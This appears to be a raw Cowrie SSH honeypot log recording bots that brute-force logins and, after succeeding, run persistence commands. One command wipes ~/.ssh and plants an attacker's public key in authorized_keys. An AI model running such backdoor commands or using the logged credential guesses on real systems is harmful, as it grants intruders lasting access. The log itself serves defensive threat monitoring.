{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.367331Z","src_ip":"211.22.25.164","session":"f36b6b9990cc"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":40520,"dst_ip":"1.2.3.4","dst_port":22,"session":"69ac58ce08c5","protocol":"ssh","message":"New connection: 92.118.39.62:40520 (1.2.3.4:22) [session: 69ac58ce08c5]","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.438516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.439406Z","src_ip":"92.118.39.62","session":"69ac58ce08c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.462413Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.469546Z","src_ip":"92.118.39.62","session":"69ac58ce08c5"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"Admin@9000","message":"login attempt [Administrator/Admin@9000] failed","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.561837Z","src_ip":"92.118.39.62","session":"69ac58ce08c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:35.659646Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.660323Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.661299Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:35.737003Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.737608Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.835381Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.836263Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.864172Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":53896,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fe3ddef49a3","protocol":"ssh","message":"New connection: 51.81.118.153:53896 (1.2.3.4:22) [session: 1fe3ddef49a3]","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.942116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.943010Z","src_ip":"51.81.118.153","session":"1fe3ddef49a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.044153Z","src_ip":"51.81.118.153","session":"1fe3ddef49a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.310290Z","src_ip":"211.22.25.164","session":"f36b6b9990cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:36.332973Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.333685Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.491692Z","src_ip":"51.81.118.153","session":"1fe3ddef49a3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.537677Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.538533Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.550525Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.551802Z","src_ip":"211.22.25.164","session":"f36b6b9990cc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.593193Z","src_ip":"92.118.39.62","session":"69ac58ce08c5"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53600,"dst_ip":"1.2.3.4","dst_port":22,"session":"02c73073010e","protocol":"ssh","message":"New connection: 152.32.190.168:53600 (1.2.3.4:22) [session: 02c73073010e]","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.740745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.741368Z","src_ip":"152.32.190.168","session":"02c73073010e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:36.945915Z","src_ip":"152.32.190.168","session":"02c73073010e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:37.593976Z","src_ip":"51.81.118.153","session":"1fe3ddef49a3"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":53898,"dst_ip":"1.2.3.4","dst_port":22,"session":"04841f5681cf","protocol":"ssh","message":"New connection: 51.81.118.153:53898 (1.2.3.4:22) [session: 04841f5681cf]","sensor":"my-vps","timestamp":"2025-09-09T04:06:37.682962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:37.683837Z","src_ip":"51.81.118.153","session":"04841f5681cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:37.780339Z","src_ip":"51.81.118.153","session":"04841f5681cf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:06:37.803197Z","src_ip":"152.32.190.168","session":"02c73073010e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:38.205866Z","src_ip":"51.81.118.153","session":"04841f5681cf"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:38.303770Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:38.304780Z","src_ip":"51.81.118.153","session":"04841f5681cf"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:39.009157Z","src_ip":"152.32.190.168","session":"02c73073010e"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":58410,"dst_ip":"1.2.3.4","dst_port":22,"session":"f91e8e79dacd","protocol":"ssh","message":"New connection: 152.32.190.168:58410 (1.2.3.4:22) [session: f91e8e79dacd]","sensor":"my-vps","timestamp":"2025-09-09T04:06:39.220908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:39.221663Z","src_ip":"152.32.190.168","session":"f91e8e79dacd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:39.431436Z","src_ip":"152.32.190.168","session":"f91e8e79dacd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:40.298311Z","src_ip":"152.32.190.168","session":"f91e8e79dacd"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:40.502395Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:40.506111Z","src_ip":"152.32.190.168","session":"f91e8e79dacd"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":49818,"dst_ip":"1.2.3.4","dst_port":22,"session":"717c1164c3ab","protocol":"ssh","message":"New connection: 192.210.135.20:49818 (1.2.3.4:22) [session: 717c1164c3ab]","sensor":"my-vps","timestamp":"2025-09-09T04:06:58.448521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:58.449632Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:58.558902Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.login.success","username":"root","password":"QWEqaz123!@#","message":"login attempt [root/QWEqaz123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.039308Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:59.346828Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.347515Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.348629Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.459553Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:59.738962Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
